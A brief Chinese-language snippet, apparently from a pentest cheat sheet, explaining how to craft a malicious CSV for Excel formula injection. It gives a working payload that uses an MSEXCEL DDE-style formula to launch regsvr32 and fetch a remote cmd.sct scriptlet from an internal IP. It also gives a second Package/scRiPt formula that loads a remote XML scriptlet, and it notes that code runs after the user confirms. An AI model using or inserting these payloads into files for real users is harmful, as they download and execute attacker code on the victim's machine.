以 MSEXCEL
包为例,新建CSV文档,内容类似下面
fillerText1,fillerText2,fillerText3,=MSEXCEL|'\..\..\..\Windows\System32\regsvr32 /s /n /u /i:http://192.168.154.200/cmd.sct scrobj.dll'!''
用户确认后可执行代码
参考文章: When Scriptlets Attack: Excel’s Alternative to DDE Code Execution
此方法可通过 Excel 加载 scriptlet
=Package|'scRiPt:http://XXXX/XXXX.xml'!""